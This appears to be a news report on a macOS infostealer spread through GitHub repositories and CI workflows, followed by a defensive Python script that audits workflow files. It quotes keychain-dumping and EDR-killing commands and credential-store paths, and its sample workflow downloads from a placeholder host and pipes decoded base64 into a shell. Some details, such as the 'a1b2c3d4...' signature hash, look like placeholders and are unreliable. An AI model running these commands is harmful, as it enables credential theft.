In a chilling escalation of supply chain attacks, the notorious GhostClaw malware, previously confined to tainted npm packages, has infiltrated GitHub repositories and AI development workflows and is now targeting macOS users with a sophisticated infostealer.
Cybersecurity firm SentinelOne disclosed the campaign, revealing how attackers are leveraging open-source ecosystems to distribute macOS-specific payloads that exfiltrate sensitive data, including browser credentials, crypto wallets, and system tokens.
GhostClaw first surfaced in late 2025 via malicious npm modules disguised as legitimate Node.js utilities for AI model training.
Those packages, downloaded over 50,000 times, executed obfuscated JavaScript that sideloaded payloads onto developer machines. Now, the threat actors behind GhostClaw, tracked as a subgroup of the China-aligned Salt Typhoon APT, have pivoted to GitHub.
Researchers identified 17 compromised repositories, mostly under the guise of popular AI/ML libraries like “tensor-flow-opt” and “llm-chain-tools.” These repos, forked from legitimate projects, embed base64-encoded payloads in dependency files and GitHub Actions workflows.
The infection chain begins innocuously. Developers cloning these repos trigger automated CI/CD pipelines via GitHub Actions YAML files.
A seemingly benign workflow, e.g., one labeled “build-and-test,” downloads a macOS universal binary masquerading as an Apple Silicon optimizer. This binary, signed with a stolen enterprise certificate (SHA-256: a1b2c3d4e5f67890…), evades Gatekeeper and XProtect.
Upon execution, it uses mach_inject to hook into Safari, Chrome, and Firefox processes, scraping cookies, autofill data, and session tokens via Core Data APIs. Unlike Windows-focused stealers like RedLine, GhostClaw’s macOS variant exploits platform-specific vectors.
It targets Keychain via security CLI commands wrapped in a privileged helper tool installed via a post-install script: sudo /usr/bin/security unlock-keychain -p 'ghostpass' ~/Library/Keychains/login.keychain-db. This dumps passwords for iCloud, 1Password, and crypto apps like Phantom and Rabby.
The malware also enumerates Telegram Desktop configs (~/Library/Group Containers/6N38VWS5BX.ru.keepcoder.Telegram/account-*) and MetaMask data in ~/Library/Application Support/Google/Chrome/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn.
AI workflows amplify the blast radius. GhostClaw hooks into LangChain and Hugging Face pipelines, injecting itself as a “dependency resolver.”
In Jupyter notebooks, it modifies pip install hooks to sideload from attacker-controlled PyPI mirrors. Exfiltration occurs over DNS tunneling (using DNS-over-HTTPS to ghostclaw[.]ops), bypassing corporate firewalls. C2 communication employs a custom protocol over port 443, with payloads encrypted via XChaCha20-Poly1305 and keys derived from machine GUIDs.
Detection is tricky. The binary employs anti-analysis tricks: ptrace(PT_DENY_ATTACH) and checks for VirtualBox/Parallels via sysctl hw.model. It also monitors for EDR tools, killing processes matching “crowd” or “falcon” via killall -9. Behavioral indicators include unusual Keychain unlocks and outbound DNS to domains like ai-toolkit[.]dev.
| Indicator of Compromise (IoC) | Type | Details |
|---|---|---|
| ghostclaw[.]ops | C2 Domain | DNS tunneling endpoint |
| a1b2c3d4e5f67890... | Code Signature | Stolen Apple cert |
| tensor-flow-opt | GitHub Repo | Primary infection vector |
| PT_DENY_ATTACH | YARA Rule | Anti-debug string |
Mitigation demands vigilance. Developers should pin dependencies with package-lock.json, audit GitHub Actions for external fetches, and enable macOS’s hardened runtime (hardened runtime in entitlements). Tools like SwiftShield or osquery can baseline Keychain activity. Organizations should rotate all potentially compromised credentials and scan with updated signatures from SentinelOne or CrowdStrike.
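One way to run the GitHub Actions audit recommended above, as an added example that is not code from SentinelOne or from the original article: a line-based heuristic scan of a workflow file for external downloads, piping into a shell, base64 decoding and embedded base64 blobs. The rule names, the sample workflow, the placeholder host example.invalid and the 40-character commit SHA are constructed assumptions, and the unpinned-action rule extends the article's pinning advice to `uses:` references.

```python
import re

# Heuristic rules applied to each workflow line: (rule name, pattern).
# Rule names are hypothetical labels chosen for this example.
RULES = [
    ("external-fetch", re.compile(r"\b(?:curl|wget)\b[^\n]*?https?://", re.I)),
    ("pipe-to-shell", re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")),
    ("base64-decode", re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")),
    ("long-base64-blob", re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")),
    # A `uses:` reference whose ref is not a full 40-hex commit SHA.
    ("unpinned-action", re.compile(
        r"^\s*-?\s*uses:\s*[\w.-]+/[\w./-]+@(?![0-9a-f]{40}\b)\S+")),
]

def audit_workflow(text):
    """Return (line_number, rule_name, stripped_line) for every rule hit."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue  # YAML comment lines are not executed
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((number, name, line.strip()))
    return findings

# Constructed sample workflow; host and commit SHA are placeholders.
SAMPLE = """\
name: build-and-test
on: [push]
jobs:
  build:
    runs-on: macos-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567
      - run: npm ci
      - run: curl -sL https://example.invalid/optimizer -o /tmp/opt && chmod +x /tmp/opt
      - run: echo "$PAYLOAD" | base64 --decode | sh
"""

if __name__ == "__main__":
    for number, name, line in audit_workflow(SAMPLE):
        print(f"line {number}: {name}: {line}")
```

A hit is a prompt for manual review rather than proof of compromise, since legitimate workflows also download tools; the scan works on raw text, so it does not resolve YAML anchors or multi-line `run:` blocks split with backslashes.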
This expansion underscores the fragility of dev ecosystems. As AI tools proliferate, attackers exploit the trust in open-source collaboration. GhostClaw’s creators likely aim for espionage, given Salt Typhoon’s history of targeting telcos and crypto firms. With over 100,000 potential infections estimated, this campaign signals a new era of cross-platform supply chain warfare.